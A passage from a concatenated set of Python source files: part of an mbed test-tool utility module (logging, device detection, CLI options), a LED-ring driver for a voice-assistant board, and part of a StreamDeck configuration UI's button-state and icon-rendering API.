ERROR='Error',
EXCEPT='Exception')
self.LogToFileAttr = construct_enum(CREATE=1, # Create or overwrite existing log file
APPEND=2) # Append to existing log file
def log_line(self, LogType, log_line, timestamp=True, line_delim='\n'):
""" Log one line of text
"""
log_timestamp = time()
log_entry = {'log_type' : LogType,
'log_timestamp' : log_timestamp,
'log_line' : log_line,
'_future' : None
}
# Store log in memory
if self.store_log:
self.log.append(log_entry)
return log_entry
class CLITestLogger(TestLogger):
""" Logger used with CLI (Command line interface) test suite. Logs on screen and to file if needed
"""
def __init__(self, store_log=True, file_name=None):
TestLogger.__init__(self)
self.log_file_name = file_name
#self.TIMESTAMP_FORMAT = '%y-%m-%d %H:%M:%S' # Full date and time
self.TIMESTAMP_FORMAT = '%H:%M:%S' # Time only
def log_print(self, log_entry, timestamp=True):
""" Prints on screen formatted log entry
"""
ts = log_entry['log_timestamp']
timestamp_str = datetime.datetime.fromtimestamp(ts).strftime("[%s] "% self.TIMESTAMP_FORMAT) if timestamp else ''
log_line_str = "%(log_type)s: %(log_line)s"% (log_entry)
return timestamp_str + log_line_str
def log_line(self, LogType, log_line, timestamp=True, line_delim='\n'):
""" Logs line, if log file output was specified log line will be appended
at the end of log file
"""
log_entry = TestLogger.log_line(self, LogType, log_line)
log_line_str = self.log_print(log_entry, timestamp)
if self.log_file_name is not None:
try:
with open(self.log_file_name, 'a') as f:
f.write(log_line_str + line_delim)
except IOError:
pass
return log_line_str
def factory_db_logger(db_url):
""" Factory database driver depending on database type supplied in database connection string db_url
"""
if db_url is not None:
from tools.test_mysql import MySQLDBAccess
connection_info = BaseDBAccess().parse_db_connection_string(db_url)
if connection_info is not None:
(db_type, username, password, host, db_name) = BaseDBAccess().parse_db_connection_string(db_url)
if db_type == 'mysql':
return MySQLDBAccess()
return None
def detect_database_verbose(db_url):
""" uses verbose mode (prints) database detection sequence to check it database connection string is valid
"""
result = BaseDBAccess().parse_db_connection_string(db_url)
if result is not None:
# Parsing passed
(db_type, username, password, host, db_name) = result
#print "DB type '%s', user name '%s', password '%s', host '%s', db name '%s'"% result
# Let's try to connect
db_ = factory_db_logger(db_url)
if db_ is not None:
print "Connecting to database '%s'..."% db_url,
db_.connect(host, username, password, db_name)
if db_.is_connected():
print "ok"
print "Detecting database..."
print db_.detect_database(verbose=True)
print "Disconnecting...",
db_.disconnect()
print "done"
else:
print "Database type '%s' unknown"% db_type
else:
print "Parse error: '%s' - DB Url error"% (db_url)
def get_module_avail(module_name):
""" This function returns True if module_name is already impored module
"""
return module_name in sys.modules.keys()
def get_autodetected_MUTS_list(platform_name_filter=None):
oldError = None
if os.name == 'nt':
# Disable Windows error box temporarily
oldError = ctypes.windll.kernel32.SetErrorMode(1) #note that SEM_FAILCRITICALERRORS = 1
mbeds = mbed_lstools.create()
detect_muts_list = mbeds.list_mbeds()
if os.name == 'nt':
ctypes.windll.kernel32.SetErrorMode(oldError)
return get_autodetected_MUTS(detect_muts_list, platform_name_filter=platform_name_filter)
def get_autodetected_MUTS(mbeds_list, platform_name_filter=None):
""" Function detects all connected to host mbed-enabled devices and generates artificial MUTS file.
If function fails to auto-detect devices it will return empty dictionary.
if get_module_avail('mbed_lstools'):
mbeds = mbed_lstools.create()
mbeds_list = mbeds.list_mbeds()
@param mbeds_list list of mbeds captured from mbed_lstools
@param platform_name You can filter 'platform_name' with list of filtered targets from 'platform_name_filter'
"""
result = {} # Should be in muts_all.json format
# Align mbeds_list from mbed_lstools to MUT file format (JSON dictionary with muts)
# mbeds_list = [{'platform_name': 'NUCLEO_F302R8', 'mount_point': 'E:', 'target_id': '07050200623B61125D5EF72A', 'serial_port': u'COM34'}]
index = 1
for mut in mbeds_list:
# Filter the MUTS if a filter is specified
if platform_name_filter and not mut['platform_name'] in platform_name_filter:
continue
# For mcu_unique - we are assigning 'platform_name_unique' value from mbedls output (if its existing)
# if not we are creating our own unique value (last few chars from platform's target_id).
m = {'mcu': mut['platform_name'],
'mcu_unique' : mut['platform_name_unique'] if 'platform_name_unique' in mut else "%s[%s]" % (mut['platform_name'], mut['target_id'][-4:]),
'port': mut['serial_port'],
'disk': mut['mount_point'],
'peripherals': [] # No peripheral detection
}
if index not in result:
result[index] = {}
result[index] = m
index += 1
return result
def get_autodetected_TEST_SPEC(mbeds_list,
use_default_toolchain=True,
use_supported_toolchains=False,
toolchain_filter=None,
platform_name_filter=None):
""" Function detects all connected to host mbed-enabled devices and generates artificial test_spec file.
If function fails to auto-detect devices it will return empty 'targets' test_spec description.
use_default_toolchain - if True add default toolchain to test_spec
use_supported_toolchains - if True add all supported toolchains to test_spec
toolchain_filter - if [...list of toolchains...] add from all toolchains only those in filter to test_spec
"""
result = {'targets': {} }
for mut in mbeds_list:
mcu = mut['mcu']
if platform_name_filter is None or (platform_name_filter and mut['mcu'] in platform_name_filter):
if mcu in TARGET_MAP:
default_toolchain = TARGET_MAP[mcu].default_toolchain
supported_toolchains = TARGET_MAP[mcu].supported_toolchains
# Decide which toolchains should be added to test specification toolchain pool for each target
toolchains = []
if use_default_toolchain:
toolchains.append(default_toolchain)
if use_supported_toolchains:
toolchains += supported_toolchains
if toolchain_filter is not None:
all_toolchains = supported_toolchains + [default_toolchain]
for toolchain in toolchain_filter.split(','):
if toolchain in all_toolchains:
toolchains.append(toolchain)
result['targets'][mcu] = list(set(toolchains))
return result
def get_default_test_options_parser():
""" Get common test script options used by CLI, web services etc.
"""
parser = optparse.OptionParser()
parser.add_option('-i', '--tests',
dest='test_spec_filename',
metavar="FILE",
help='Points to file with test specification')
parser.add_option('-M', '--MUTS',
dest='muts_spec_filename',
metavar="FILE",
help='Points to file with MUTs specification (overwrites settings.py and private_settings.py)')
parser.add_option("-j", "--jobs",
dest='jobs',
metavar="NUMBER",
type="int",
help="Define number of compilation jobs. Default value is 1")
if get_module_avail('mbed_lstools'):
# Additional features available when mbed_lstools is installed on host and imported
# mbed_lstools allow users to detect connected to host mbed-enabled devices
parser.add_option('', '--auto',
dest='auto_detect',
metavar=False,
action="store_true",
help='Use mbed-ls module to detect all connected mbed devices')
parser.add_option('', '--tc',
dest='toolchains_filter',
help="Toolchain filter for --auto option. Use toolchains names separated by comma, 'default' or 'all' to select toolchains")
test_scopes = ','.join(["'%s'" % n for n in get_available_oper_test_scopes()])
parser.add_option('', '--oper',
dest='operability_checks',
help='Perform interoperability tests between host and connected mbed devices. Available test scopes are: %s' % test_scopes)
parser.add_option('', '--clean',
dest='clean',
metavar=False,
action="store_true",
help='Clean the build directory')
parser.add_option('-P', '--only-peripherals',
dest='test_only_peripheral',
default=False,
action="store_true",
help='Test only peripheral declared for MUT and skip common tests')
parser.add_option('-C', '--only-commons',
dest='test_only_common',
default=False,
action="store_true",
help='Test only board internals. Skip perpherials tests and perform common tests')
parser.add_option('-n', '--test-by-names',
dest='test_by_names',
help='Runs only test enumerated it this switch. Use comma to separate test case names')
parser.add_option('-p', '--peripheral-by-names',
dest='peripheral_by_names',
help='Forces discovery of particular peripherals. Use comma to separate peripheral names')
copy_methods = host_tests_plugins.get_plugin_caps('CopyMethod')
copy_methods_str = "Plugin support: " + ', '.join(copy_methods)
parser.add_option('-c', '--copy-method',
dest='copy_method',
help="Select binary copy (flash) method. Default is Python's shutil.copy() method. %s"% copy_methods_str)
reset_methods = host_tests_plugins.get_plugin_caps('ResetMethod')
reset_methods_str = "Plugin support: " + ', '.join(reset_methods)
parser.add_option('-r', '--reset-type',
dest='mut_reset_type',
default=None,
help='Extra reset method used to reset MUT by host test script. %s'% reset_methods_str)
parser.add_option('-g', '--goanna-for-tests',
dest='goanna_for_tests',
metavar=False,
action="store_true",
help='Run Goanna static analyse tool for tests. (Project will be rebuilded)')
parser.add_option('-G', '--goanna-for-sdk',
dest='goanna_for_mbed_sdk',
metavar=False,
action="store_true",
help='Run Goanna static analyse tool for mbed SDK (Project will be rebuilded)')
parser.add_option('-s', '--suppress-summary',
dest='suppress_summary',
default=False,
action="store_true",
help='Suppresses display of wellformatted table with test results')
parser.add_option('-t', '--test-summary',
dest='test_x_toolchain_summary',
default=False,
action="store_true",
help='Displays wellformatted table with test x toolchain test result per target')
parser.add_option('-A', '--test-automation-report',
dest='test_automation_report',
default=False,
action="store_true",
help='Prints information about all tests and exits')
parser.add_option('-R', '--test-case-report',
dest='test_case_report',
default=False,
action="store_true",
help='Prints information about all test cases and exits')
parser.add_option("-S", "--supported-toolchains",
action="store_true",
dest="supported_toolchains",
default=False,
help="Displays supported matrix of MCUs and toolchains")
parser.add_option("-O", "--only-build",
action="store_true",
dest="only_build_tests",
default=False,
help="Only build tests, skips actual test procedures (flashing etc.)")
parser.add_option('', '--parallel',
dest='parallel_test_exec',
default=False,
action="store_true",
help='Experimental, you execute test runners for connected to your host MUTs in parallel (speeds up test result collection)')
parser.add_option('', '--config',
dest='verbose_test_configuration_only',
default=False,
action="store_true",
help='Displays full test specification and MUTs configration and exits')
parser.add_option('', '--loops',
dest='test_loops_list',
help='Set no. of loops per test. Format: TEST_1=1,TEST_2=2,TEST_3=3')
parser.add_option('', '--global-loops',
dest='test_global_loops_value',
help='Set global number of test loops per test. Default value is set 1')
parser.add_option('', '--consolidate-waterfall',
dest='consolidate_waterfall_test',
default=False,
action="store_true",
help='Used with --waterfall option. Adds only one test to report reflecting outcome of waterfall test.')
parser.add_option('-W', '--waterfall',
dest='waterfall_test',
default=False,
action="store_true",
help='Used with --loops or --global-loops options. Tests until OK result occurs and assumes test passed')
parser.add_option('-N', '--firmware-name',
dest='firmware_global_name',
help='Set global name for all produced projects. Note, proper file extension will be added by buid scripts')
parser.add_option('-u', '--shuffle',
dest='shuffle_test_order',
default=False,
action="store_true",
help='Shuffles test execution order')
parser.add_option('', '--shuffle-seed',
dest='shuffle_test_seed',
default=None,
help='Shuffle seed (If you want to reproduce your shuffle order please use seed provided in test summary)')
parser.add_option('-f', '--filter',
dest='general_filter_regex',
default=None,
help='For some commands you can use filter to filter out results')
parser.add_option('', '--inc-timeout',
dest='extend_test_timeout',
metavar="NUMBER",
type="int",
help='You can increase global timeout for each test by specifying additional test timeout in seconds')
parser.add_option('', '--db',
dest='db_url',
help='This specifies what database test suite uses to store its state. To pass DB connection info use database connection string. Example: \'mysql://username:password@127.0.0.1/db_name\'')
parser.add_option('-l', '--log',
dest='log_file_name',
help='Log events to external file (note not all console entries may be visible in log file)')
parser.add_option('', '--report-html',
dest='report_html_file_name',
help='You can log test suite results in form of HTML report')
parser.add_option('', '--report-junit',
dest='report_junit_file_name',
help='You can log test suite results in form of JUnit compliant XML report')
parser.add_option("", "--report-build",
dest="report_build_file_name",
help="Output the build results to a junit xml file")
parser.add_option('', '--verbose-skipped',
dest='verbose_skipped_tests',
default=False,
action="store_true",
help='Prints some extra information about skipped tests')
parser.add_option('-V', '--verbose-test-result',
dest='verbose_test_result_only',
default=False,
action="store_true",
help='Prints test serial output')
parser.add_option('-v', '--verbose',
dest='verbose',
default=False,
action="store_true",
help='Verbose mode (prints some extra information)')
parser.add_option('', '--version',
dest='version',
default=False,
action="store_true",
help='Prints script version and exits')
return parser
def test_path_to_name(path):
"""Change all slashes in a path into hyphens
This creates a unique cross-platform test name based on the path
This can eventually be overriden by a to-be-determined meta-data mechanism"""
name_parts = []
head, tail = os.path.split(path)
while (tail and tail != "."):
name_parts.insert(0, tail)
head, tail = os.path.split(head)
return "-".join(name_parts).lower()
def find_tests(base_dir):
"""Given any directory, walk through the subdirectories and find all tests"""
def find_test_in_directory(directory, tests_path):
"""Given a 'TESTS' directory, return a dictionary of test names and test paths.
The formate of the dictionary is {"test-name": "./path/to/test"}"""
test = None
if tests_path in directory:
head, test_case_directory = os.path.split(directory)
if test_case_directory != tests_path and test_case_directory != "host_tests":
head, test_group_directory = os.path.split(head)
if test_group_directory != tests_path and test_case_directory != "host_tests":
test = {
"name": test_path_to_name(directory),
"path": directory
}
return test
tests_path = 'TESTS'
tests = {}
dirs = scan_for_source_paths(base_dir)
for directory in dirs:
test = find_test_in_directory(directory, tests_path)
if test:
tests[test['name']] = test['path']
return tests
def print_tests(tests, format="list", sort=True):
"""Given a dictionary of tests (as returned from "find_tests"), print them
in the specified format"""
if format == "list":
for test_name in sorted(tests.keys()):
test_path = tests[test_name]
print "Test Case:"
print " Name: %s" % test_name
print " Path: %s" % test_path
elif format == "json":
print json.dumps(tests, indent=2)
else:
print "Unknown format '%s'" % format
sys.exit(1)
def build_tests(tests, base_source_paths, build_path, target, toolchain_name,
options=None, clean=False, notify=None, verbose=False, jobs=1,
macros=None, silent=False, report=None, properties=None,
continue_on_build_fail=False):
"""Given the data structure from 'find_tests' and the typical build parameters,
build all the tests
Returns a tuple of the build result (True or False) followed by the test
build data structure"""
test_build = {
"platform": target.name,
"toolchain": toolchain_name,
"base_path": build_path,
"baud_rate": 9600,
"binary_type": "bootable",
"tests": {}
}
result = True
for test_name, test_path in tests.iteritems():
test_build_path = os.path.join(build_path, test_path)
src_path = base_source_paths + [test_path]
bin_file = None
try:
bin_file = build_project(src_path, test_build_path, target, toolchain_name,
options=options,
jobs=jobs,
clean=clean,
macros=macros,
name=test_name,
report=report,
properties=properties,
verbose=verbose)
except Exception, e:
if not isinstance(e, NotSupportedException):
result = False
if continue_on_build_fail:
continue
else:
break
# If a clean build was carried out last time, disable it for the next build.
# Otherwise the previously built test will be deleted.
if clean:
clean = False
# Normalize the path
if bin_file:
bin_file = os.path.normpath(bin_file)
test_build['tests'][test_name] = {
"binaries": [
{
"path": bin_file
}
]
}
print 'Image: %s'% bin_file
test_builds = {}
test_builds["%s-%s" % (target.name, toolchain_name)] = test_build
return result, test_builds
def test_spec_from_test_builds(test_builds):
return {
"builds": test_builds
}
|
pixels.py
|
import apa102
import time
import threading
from gpiozero import LED
try:
import queue as Queue
except ImportError:
import Queue as Queue
from alexa_led_pattern import AlexaLedPattern
from google_home_led_pattern import GoogleHomeLedPattern
class Pixels:
PIXELS_N = 12
def __init__(self, pattern=AlexaLedPattern):
self.pattern = pattern(show=self.show)
self.dev = apa102.APA102(num_led=self.PIXELS_N)
self.power = LED(5)
self.power.on()
self.queue = Queue.Queue()
self.thread = threading.Thread(target=self._run)
self.thread.daemon = True
self.thread.start()
self.last_direction = None
def wakeup(self, direction=0):
self.last_direction = direction
def f():
self.pattern.wakeup(direction)
self.put(f)
def listen(self):
if self.last_direction:
def f():
self.pattern.wakeup(self.last_direction)
self.put(f)
else:
self.put(self.pattern.listen)
def think(self):
self.put(self.pattern.think)
def speak(self):
self.put(self.pattern.speak)
def off(self):
self.put(self.pattern.off)
def put(self, func):
self.pattern.stop = True
self.queue.put(func)
def _run(self):
while True:
func = self.queue.get()
self.pattern.stop = False
func()
def show(self, data):
for i in range(self.PIXELS_N):
self.dev.set_pixel(i, int(data[4*i + 1]), int(data[4*i + 2]), int(data[4*i + 3]))
self.dev.show()
pixels = Pixels()
if __name__ == '__main__':
while True:
try:
pixels.wakeup()
time.sleep(3)
pixels.think()
time.sleep(3)
pixels.speak()
time.sleep(6)
pixels.off()
time.sleep(3)
except KeyboardInterrupt:
break
pixels.off()
time.sleep(1)
|
api.py
|
"""Defines the Python API for interacting with the StreamDeck Configuration UI"""
import itertools
import json
import os
import threading
import time
from functools import partial
from io import BytesIO
from typing import Dict, Tuple, Union, cast
from warnings import warn
import cairosvg
from fractions import Fraction
from PIL import Image, ImageDraw, ImageFont, ImageSequence
from PySide2.QtCore import QObject, Signal
from StreamDeck import DeviceManager
from StreamDeck.Devices import StreamDeck
from StreamDeck.ImageHelpers import PILHelper
from StreamDeck.Transport.Transport import TransportError
from streamdeck_ui.config import CONFIG_FILE_VERSION, DEFAULT_FONT, FONTS_PATH, STATE_FILE, ICON_DIR
image_cache: Dict[str, memoryview] = {}
decks: Dict[str, StreamDeck.StreamDeck] = {}
state: Dict[str, Dict[str, Union[int, Dict[int, Dict[int, Dict[str, str]]]]]] = {}
streamdecks_lock = threading.Lock()
key_event_lock = threading.Lock()
animation_buttons = dict()
class KeySignalEmitter(QObject):
key_pressed = Signal(str, int, bool)
streamdesk_keys = KeySignalEmitter()
def _key_change_callback(deck_id: str, _deck: StreamDeck.StreamDeck, key: int, state: bool) -> None:
""" Callback whenever a key is pressed. This is method runs the various actions defined
for the key being pressed, sequentially. """
# Stream Desk key events fire on a background thread. Emit a signal
# to bring it back to UI thread, so we can use Qt objects for timers etc.
# Since multiple keys could fire simultaniously, we need to protect
# shared state with a lock
with key_event_lock:
streamdesk_keys.key_pressed.emit(deck_id, key, state)
def get_display_timeout(deck_id: str) -> int:
""" Returns the amount of time in seconds before the display gets dimmed."""
return cast(int, state.get(deck_id, {}).get("display_timeout", 0))
def set_display_timeout(deck_id: str, timeout: int) -> None:
""" Sets the amount of time in seconds before the display gets dimmed."""
state.setdefault(deck_id, {})["display_timeout"] = timeout
_save_state()
def _save_state():
export_config(STATE_FILE)
def _open_config(config_file: str):
global state
with open(config_file) as state_file:
config = json.loads(state_file.read())
file_version = config.get("streamdeck_ui_version", 0)
if file_version != CONFIG_FILE_VERSION:
raise ValueError(
"Incompatible version of config file found: "
f"{file_version} does not match required version "
f"{CONFIG_FILE_VERSION}."
)
state = {}
for deck_id, deck in config["state"].items():
deck["buttons"] = {
int(page_id): {int(button_id): button for button_id, button in buttons.items()}
for page_id, buttons in deck.get("buttons", {}).items()
}
state[deck_id] = deck
def import_config(config_file: str) -> None:
_open_config(config_file)
render()
_save_state()
def export_config(output_file: str) -> None:
try:
with open(output_file + ".tmp", "w") as state_file:
state_file.write(
json.dumps(
{"streamdeck_ui_version": CONFIG_FILE_VERSION, "state": state},
indent=4,
separators=(",", ": "),
)
)
except Exception as error:
print(f"The configuration file '{output_file}' was not updated. Error: {error}")
raise
else:
os.replace(output_file + ".tmp", os.path.realpath(output_file))
def export_icon(deck_id: str, page: int, button_id: int, icon_frames_to_save: list) -> None:
"""export rendered icon"""
if not os.path.isdir(ICON_DIR):
os.mkdir(ICON_DIR)
key = f"{deck_id}.{page}.{button_id}"
try:
gif = icon_frames_to_save
if gif.__len__() > 1:
gif[0].save(
ICON_DIR + key + ".png",
save_all=True,
append_images=gif[1:],
optimize=False,
loop=0,
duration=40 # 40ms (25 fps)
)
else:
gif[0].save(ICON_DIR + key + ".png")
except Exception as error:
print(f"The icon file '{key}'.png was not updated. Error: {error}")
raise
def open_decks() -> Dict[str, Dict[str, Union[str, Tuple[int, int]]]]:
"""Opens and then returns all known stream deck devices"""
for deck in DeviceManager.DeviceManager().enumerate():
deck.open()
deck.reset()
deck_id = deck.get_serial_number()
decks[deck_id] = deck
deck.set_key_callback(partial(_key_change_callback, deck_id))
return {
deck_id: {"type": deck.deck_type(), "layout": deck.key_layout()}
for deck_id, deck in decks.items()
}
def close_decks() -> None:
"""Closes open decks for input/ouput."""
for _deck_serial, deck in decks.items():
if deck.connected():
deck.set_brightness(50)
deck.reset()
deck.close()
def ensure_decks_connected() -> None:
"""Reconnects to any decks that lost connection. If they did, re-renders them."""
for deck_serial, deck in decks.copy().items():
if not deck.connected():
for new_deck in DeviceManager.DeviceManager().enumerate():
try:
new_deck.open()
new_deck_serial = new_deck.get_serial_number()
except Exception as error:
warn(f"A {error} error occurred when trying to reconnect to {deck_serial}")
new_deck_serial = None
if new_deck_serial == deck_serial:
deck.close()
new_deck.reset()
new_deck.set_key_callback(partial(_key_change_callback, new_deck_serial))
decks[new_deck_serial] = new_deck
render()
def get_deck(deck_id: str) -> Dict[str, Dict[str, Union[str, Tuple[int, int]]]]:
return {"type": decks[deck_id].deck_type(), "layout": decks[deck_id].key_layout()}
def _deck_state(deck_id: str) -> dict:
return state.setdefault(deck_id, {}) # type: ignore
def _page_state(deck_id: str, page: int) -> dict:
buttons = state.setdefault(deck_id, {}).setdefault("buttons", {})
return buttons.setdefault(page, {}) # type: ignore
def _button_state(deck_id: str, page: int, button: int) -> dict:
buttons = state.setdefault(deck_id, {}).setdefault("buttons", {})
buttons_state = buttons.setdefault(page, {}) # type: ignore
return buttons_state.setdefault(button, {}) # type: ignore
def swap_buttons(deck_id: str, page: int, source_button: int, target_button: int) -> None:
"""Swaps the properties of the source and target buttons"""
temp = cast(dict, state[deck_id]["buttons"])[page][source_button]
cast(dict, state[deck_id]["buttons"])[page][source_button] = cast(
dict, state[deck_id]["buttons"]
)[page][target_button]
cast(dict, state[deck_id]["buttons"])[page][target_button] = temp
# Clear the cache so images will be recreated on render
image_cache.pop(f"{deck_id}.{page}.{source_button}", None)
image_cache.pop(f"{deck_id}.{page}.{target_button}", None)
if os.path.isfile(ICON_DIR + f"{deck_id}.{page}.{source_button}" + ".png"):
os.remove(ICON_DIR + f"{deck_id}.{page}.{source_button}" + ".png")
if os.path.isfile(ICON_DIR + f"{deck_id}.{page}.{target_button}" + ".png"):
os.remove(ICON_DIR + f"{deck_id}.{page}.{target_button}" + ".png")
_save_state()
render()
def set_button_text(deck_id: str, page: int, button: int, text: str) -> None:
"""Set the text associated with a button"""
if get_button_text(deck_id, page, button) != text:
_button_state(deck_id, page, button)["text"] = text
image_cache.pop(f"{deck_id}.{page}.{button}", None)
if os.path.isfile(ICON_DIR + f"{deck_id}.{page}.{button}" + ".png"):
os.remove(ICON_DIR + f"{deck_id}.{page}.{button}" + ".png")
render()
if not bool(text):
del_none_key(deck_id, page, button, "text")
_save_state()
def get_button_text(deck_id: str, page: int, button: int) -> str:
"""Returns the text set for the specified button"""
return _button_state(deck_id, page, button).get("text", "")
def set_button_icon(deck_id: str, page: int, button: int, icon: str) -> None:
"""Sets the icon associated with a button"""
if get_button_icon(deck_id, page, button) != icon:
_button_state(deck_id, page, button)["icon"] = icon
image_cache.pop(f"{deck_id}.{page}.{button}", None)
if os.path.isfile(ICON_DIR + f"{deck_id}.{page}.{button}" + ".png"):
os.remove(ICON_DIR + f"{deck_id}.{page}.{button}" + ".png")
render()
if not bool(icon):
del_none_key(deck_id, page, button, "icon")
_save_state()
def get_button_icon(deck_id: str, page: int, button: int) -> str:
"""Returns the icon set for a particular button"""
return _button_state(deck_id, page, button).get("icon", "")
def set_button_change_brightness(deck_id: str, page: int, button: int, amount: int) -> None:
"""Sets the brightness changing associated with a button"""
if get_button_change_brightness(deck_id, page, button) != amount:
_button_state(deck_id, page, button)["brightness_change"] = amount
render()
if amount == 0:
del_none_key(deck_id, page, button, "brightness_change")
_save_state()
def get_button_change_brightness(deck_id: str, page: int, button: int) -> int:
"""Returns the brightness change set for a particular button"""
return _button_state(deck_id, page, button).get("brightness_change", 0)
def set_button_command(deck_id: str, page: int, button: int, command: str) -> None:
"""Sets the command associated with the button"""
if get_button_command(deck_id, page, button) != command:
if bool(command):
_button_state(deck_id, page, button)["command"] = command
else:
del_none_key(deck_id, page, button, "command")
_save_state()
def get_button_command(deck_id: str, page: int, button: int) -> str:
"""Returns the command set for the specified button"""
return _button_state(deck_id, page, button).get("command", "")
def set_button_switch_page(deck_id: str, page: int, button: int, switch_page: int) -> None:
"""Sets the page switch associated with the button"""
if get_button_switch_page(deck_id, page, button) != switch_page:
if switch_page != 0:
_button_state(deck_id, page, button)["switch_page"] = switch_page
else:
del_none_key(deck_id, page, button, "switch_page")
_save_state()
def get_button_switch_page(deck_id: str, page: int, button: int) -> int:
"""Returns the page switch set for the specified button. 0 implies no page switch."""
return _button_state(deck_id, page, button).get("switch_page", 0)
def set_pages_name(deck_id: str, page: int, page_name: str) -> None:
"""Sets the page name for this page"""
if get_pages_name(deck_id, page) != page_name:
if "page_names" in _deck_state(deck_id):
if bool(page_name):
_deck_state(deck_id)["page_names"][str(page)] = page_name
else:
del _deck_state(deck_id)["page_names"][str(page)]
else:
_deck_state(deck_id)["page_names"] = {str(page): page_name}
_save_state()
def get_pages_name(deck_id: str, page: int) -> str:
"""Returns the page name set for the specified page. {} implies no page name."""
return _deck_state(deck_id).get("page_names", {str(page): f"Page {page+1}"}).get(str(page), f"Page {page+1}")
def get_page_length(deck_id: str) -> int:
"""return the number of page count"""
return _deck_state(deck_id).get("buttons", {}).__len__()
def del_none_key(deck_id: str, page: int, button: int, key: str) -> None:
"""Delete the state if it's not bool"""
del _button_state(deck_id, page, button)[key]
def set_button_keys(deck_id: str, page: int, button: int, keys: str) -> None:
"""Sets the keys associated with the button"""
if get_button_keys(deck_id, page, button) != keys:
if bool(keys):
_button_state(deck_id, page, button)["keys"] = keys
else:
del_none_key(deck_id, page, button, "keys")
_save_state()
def get_button_keys(deck_id: str, page: int, button: int) -> str:
"""Returns the keys set for the specified button"""
return _button_state(deck_id, page, button).get("keys", "")
def set_button_write(deck_id: str, page: int, button: int, write: str) -> None:
"""Sets the text meant to be written when button is pressed"""
if get_button_write(deck_id, page, button) != write:
if bool(write):
_button_state(deck_id, page, button)["write"] = write
else:
del_none_key(deck_id, page, button, "write")
_save_state()
def get_button_write(deck_id: str, page: int, button: int) -> str:
"""Returns the text to be produced when the specified button is pressed"""
return _button_state(deck_id, page, button).get("write", "")
def set_brightness(deck_id: str, brightness: int) -> None:
"""Sets the brightness for every button on the deck"""
if get_brightness(deck_id) != brightness:
decks[deck_id].set_brightness(brightness)
state.setdefault(deck_id, {})["brightness"] = brightness
_save_state()
def get_brightness(deck_id: str) -> int:
"""Gets the brightness that is set for the specified stream deck"""
return state.get(deck_id, {}).get("brightness", 100) # type: ignore
def get_brightness_dimmed(deck_id: str) -> int:
"""Gets the percentage value of the full brightness that is used when dimming the specified
stream deck"""
return state.get(deck_id, {}).get("brightness_dimmed", 0) # type: ignore
def set_brightness_dimmed(deck_id: str, brightness_dimmed: int) -> None:
"""Sets the percentage value that will be used for dimming the full brightness"""
state.setdefault(deck_id, {})["brightness_dimmed"] = brightness_dimmed
_save_state()
def change_brightness(deck_id: str, amount: int = 1) -> None:
"""Change the brightness of the deck by the specified amount"""
set_brightness(deck_id, max(min(get_brightness(deck_id) + amount, 100), 0))
def get_page(deck_id: str) -> int:
"""Gets the current page shown on the stream deck"""
return state.get(deck_id, {}).get("page", 0) # type: ignore
def set_page(deck_id: str, page: int, old_page: int) -> None:
"""Sets the current page shown on the stream deck"""
if get_page(deck_id) != page:
stop_animation()
state.setdefault(deck_id, {})["page"] = page
render()
# delete the state pages who is not bool
to_delete = []
for button in _page_state(deck_id, old_page).items():
if not bool(button[1]):
to_delete.append(button[0])
if _page_state(deck_id, old_page).__len__() == to_delete.__len__():
del _deck_state(deck_id)["buttons"][old_page]
_save_state()
start_animation()
def render() -> None:
"""renders all decks"""
for deck_id, deck_state in state.items():
deck = decks.get(deck_id, None)
if not deck:
warn(f"{deck_id} has settings specified but is not seen. Likely unplugged!")
continue
page = get_page(deck_id)
for button_id, button_settings in (
deck_state.get("buttons", {}).get(page, {}).items() # type: ignore
):
key = f"{deck_id}.{page}.{button_id}"
key_image = False
if key in image_cache:
image = image_cache[key]
elif os.path.isfile(ICON_DIR + key + ".png"):
image = _load_key_image(deck, key)
key_image = True
else:
image = _render_key_image(deck, key, **button_settings)
key_image = True
if key_image:
image_cache[key] = image[0]
global animation_buttons
if deck_id not in animation_buttons: animation_buttons[deck_id] = {}
if page not in animation_buttons[deck_id]: animation_buttons[deck_id][page] = {}
animation_buttons[deck_id][page][button_id] = itertools.cycle(image)
image = image_cache[key]
with streamdecks_lock:
deck.set_key_image(button_id, image)
def _load_key_image(deck, key: str):
"""load an individual rendered key image"""
if os.path.isfile(ICON_DIR + key + ".png"):
try:
rgba_icon = Image.open(ICON_DIR + key + ".png")
except (OSError, IOError) as icon_error:
print(f"Unable to load icon {key}.png with error {icon_error}")
rgba_icon = Image.new("RGBA", (300, 300))
else:
rgba_icon = Image.new("RGBA", (300, 300))
icon_frames = list()
frame_durations = list()
frame_timestamp = [0]
rgba_icon.seek(0)
frames_n = 1
while True:
try:
frame_durations.append(rgba_icon.info['duration'])
frame_timestamp.append(frame_timestamp[-1]+rgba_icon.info['duration'])
rgba_icon.seek(rgba_icon.tell() + 1)
frames_n += 1
except EOFError: # end of gif
break
except KeyError: # no gif
break
frames = ImageSequence.Iterator(rgba_icon)
del frame_timestamp[0]
frame_ms = 0
for frame_index in range(frames_n):
if bool(frame_timestamp) and frame_ms > frame_timestamp[frame_index]:
continue
frame = frames[frame_index].convert("RGBA")
frame_image = PILHelper.create_image(deck)
icon_width, icon_height = frame_image.width, frame_image.height
frame.thumbnail((icon_width, icon_height), Image.LANCZOS)
icon_pos = ((frame_image.width - frame.width) // 2, 0)
frame_image.paste(frame, icon_pos, frame)
native_frame_image = PILHelper.to_native_format(deck, frame_image)
if bool(frame_timestamp):
while frame_ms < frame_timestamp[frame_index]:
frame_ms += 40 # 40ms/frame (25 fps)
icon_frames.append(native_frame_image)
else:
icon_frames.append(native_frame_image)
return icon_frames
def _render_key_image(deck, key: str, icon: str = "", text: str = "", font: str = DEFAULT_FONT, **kwargs):
"""Renders an individual key image"""
if icon:
try:
rgba_icon = Image.open(icon)
except (OSError, IOError) as icon_error:
print(f"Unable to load icon {icon} with error {icon_error}")
svg_code = open(icon).read()
png = cairosvg.svg2png(svg_code, output_height=72, output_width=72)
image_file = BytesIO(png)
rgba_icon = Image.open(image_file)
except (OSError, IOError) as icon_error:
print(f"Unable to load icon {icon} with error {icon_error}")
rgba_icon = Image.new("RGBA", (300, 300))
else:
rgba_icon = Image.new("RGBA", (300, 300))
icon_frames = list()
icon_frames_to_save = list()
frame_durations = list()
frame_timestamp = [0]
rgba_icon.seek(0)
frames_n = 1
while True:
try:
frame_durations.append(rgba_icon.info['duration'])
frame_timestamp.append(frame_timestamp[-1]+rgba_icon.info['duration'])
rgba_icon.seek(rgba_icon.tell() + 1)
frames_n += 1
except EOFError: # end of gif
break
except KeyError: # no gif
break
frames = ImageSequence.Iterator(rgba_icon)
del frame_timestamp[0]
frame_ms = 0
for frame_index in range(frames_n):
